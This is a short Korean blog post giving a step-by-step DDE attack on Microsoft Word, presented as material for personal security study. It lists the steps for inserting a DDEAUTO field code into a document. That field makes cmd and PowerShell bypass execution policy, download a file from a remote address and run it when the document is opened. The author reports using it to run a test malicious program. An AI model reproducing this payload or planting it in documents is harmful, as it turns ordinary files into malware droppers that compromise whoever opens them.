Security/Others
DDE 공격
bonggang
2020. 6. 1. 16:43
개인의 정보 보안 학습을 위해 작성되었습니다. 본 게시물을 불법적으로 활용하실 경우 혹은 본 게시물로 인해 발생하는 모든 문제에 대한 책임은 당사자에게 있으며, 작성자는 어떠한 법적 책임도 지지 않음을 밝힙니다. 해당 문서를 열람하는 것은 이에 대해 동의하는 것으로 간주합니다.
DDE(Dynamic Data Exchange)
사용자 편의를 위해 윈도우 운영체제에서 응용 프로그램간의 동일한 데이터를 공유하도록 허용하는 방법 중 하나로 워드뿐만 아니라 엑셀, 비쥬얼 베이직 등 다양한 응용프로그램에서 사용되고 있다.
실습
1. 삽입 - 빠른 문서 요소 - 필드 삽입 기능을 이용해 수식을 삽입해준다.
2. 우클릭-필드 코드 토클을 선택해 코맨드를 입력해준다.
{DDEAUTO C:\\Windows\\System32\\cmd.exe "/k powershell.exe -Nop -stat -ExecutionPolicy ByPass -command (New-Object System.Net.WebClient).DownloadFile('원격파일주소', '파일 이름'); ./실행파일이름 \* MERGEFORMAT \* MERGEFORMAT }
3. 문서 실행
나의 경우엔 비밀번호를 입력하지 않으면 강제종료되는 악성프로그램(a.exe)을 실행시켰다.